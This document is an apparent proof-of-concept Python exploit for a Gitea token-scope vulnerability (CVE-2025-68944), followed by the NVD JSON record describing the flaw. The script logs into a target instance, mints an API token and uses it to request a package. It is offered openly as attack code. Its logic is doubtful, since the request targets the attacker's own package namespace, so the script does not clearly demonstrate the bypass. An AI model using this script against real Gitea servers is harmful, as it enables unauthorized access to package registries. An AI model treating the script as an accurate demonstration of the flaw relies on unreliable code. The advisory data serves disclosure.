CVE-2025-68944

# CVE-2025-68944 PoC - Gitea Package Registry Token Scope Propagation # This PoC demonstrates the improper token scope handling in Gitea < 1.22.2 import requests import json GITEA_URL = "http://target-gitea-instance.com" USERNAME = "attacker" PASSWORD = "password" PACKAGE_NAME = "sensitive-package" def create_exploit_token(): """Create a package registry token that may have improper scope""" # Login to Gitea session = requests.Session() login_data = { "user_name": USERNAME, "password": PASSWORD } login_resp = session.post(f"{GITEA_URL}/user/login", data=login_data) if login_resp.status_code != 200: print("[-] Login failed") return None print("[+] Login successful") # Create package registry access token # In vulnerable versions, this token may have improper scope token_data = { "name": "exploit-token", "scopes": ["repo", "package"] } token_resp = session.post( f"{GITEA_URL}/api/v1/user/tokens", json=token_data ) if token_resp.status_code == 201: token = token_resp.json()["sha1"] print(f"[+] Token created: {token}") return token else: print("[-] Token creation failed") return None def exploit_package_access(token): """Access package that should be unauthorized with the token""" headers = { "Authorization": f"token {token}" } # Attempt to access package in different repository # In vulnerable versions, this may succeed unexpectedly package_url = f"{GITEA_URL}/api/v1/packages/{USERNAME}/{PACKAGE_NAME}" resp = requests.get(package_url, headers=headers) if resp.status_code == 200: print(f"[CRITICAL] Successfully accessed package: {PACKAGE_NAME}") print(f"[+] Package details: {json.dumps(resp.json(), indent=2)}") return True else: print(f"[-] Access denied (expected in patched version)") return False if __name__ == "__main__": print("="*60) print("CVE-2025-68944 PoC - Gitea Token Scope Propagation") print("="*60) token = create_exploit_token() if token: exploit_package_access(token)

{"cve": {"id": "CVE-2025-68944", "sourceIdentifier": "[email protected]", "published": "2025-12-26T04:15:41.357", "lastModified": "2025-12-31T22:30:32.697", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Gitea before 1.22.2 sometimes mishandles the propagation of token scope for access control within one of its own package registries."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:N", "baseScore": 5.0, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-441"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gitea:gitea:*:*:*:*:*:-:*:*", "versionEndExcluding": "1.22.2", "matchCriteriaId": "C44BF23A-21FB-4E86-84C7-CC1E52CA9B3F"}]}]}], "references": [{"url": "https://blog.gitea.com/release-of-1.22.2/", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/go-gitea/gitea/pull/31967", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/go-gitea/gitea/releases/tag/v1.22.2", "source": "[email protected]", "tags": ["Release Notes"]}]}}